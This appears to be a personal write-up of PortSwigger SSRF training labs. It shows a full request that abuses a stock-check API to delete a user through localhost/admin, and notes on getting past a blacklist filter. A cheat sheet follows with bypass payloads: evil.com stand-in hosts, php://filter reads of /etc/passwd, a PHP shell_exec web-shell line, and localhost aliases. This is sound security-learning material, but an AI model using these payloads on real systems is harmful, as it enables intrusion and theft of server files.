Basic SSRF against the local Server
https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost
When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost/admin where we can see user delete links and here we go with the request to delete that carlos:
POST /product/stock HTTP/1.1
Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
DNT: 1
Connection: close
Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9
Upgrade-Insecure-Requests: 1
stockApi=http%3A%2F%2Flocalhost/admin/delete?username=carlos
Basic SSRRF against another backend system
SSRF with blacklist-based input filter
Aha. This one is harder, i’m looking for bypass methodologies and trying a lot of stuff like:
- Encoding the URL with hex, URL, Octal, base64
- Trying limiters: url.domain;other.domain @ $ etc.
- data:// file:// gopher:// datatypes
All got me HTTP 400
"External stock check blocked for security reasons"
"Invalid external stock check url 'Invalid URL'"
{"error":"Path must start with /"}
Ok i tried to use a domain registered to localhost, this way i could get to 127.0.0.1, but with directory and parameters the filter got me again.
Hah. Ive got it…a little char case changing and it worked finally -.-‘
I should AGAIN rtfm more…would have been easy if i’d read the challenge description xD
Ressources
- https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#heading=h.kwcnj7jh5zyy
- https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
Cheat Sheet
dict://
sftp://
ldap:// or ldaps:// or ldapi://
tftp://
gopher://
file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
zip://
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
expect:// — Process Interaction Streams
;”, “/”, “?”, “:”, “@”, “=” and “&” DELIMITERS in uri schemes
#
URI = scheme:[//authority]path[?query][#fragment]
where the authority component divides into three subcomponents authority = [userinfo@]host[:port]
http://url.domain@evil.domain
data://google.com/plain;base64,SSBsb3ZlIFBIUAo=
data://text/plain;base64,SSBsb3ZlIFBIUAo=google.com
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/
php://filter/convert.base64-encode/resource=/etc/passwd
php://input&cmd=ls POST data:
<?php shell_exec($_GET['cmd']); ?>data://text/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net
zip://path/to/file.zip%23shell
DNS OWN DOMAIN TO 127.0.0.1!!!
different 127.1
upper lower case chars!!
xip.io
nip.io
Ressources
- https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#heading=h.kwcnj7jh5zyy
- https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
- https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf
- https://github.com/cujanovic/SSRF-Testing
- https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
- http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/
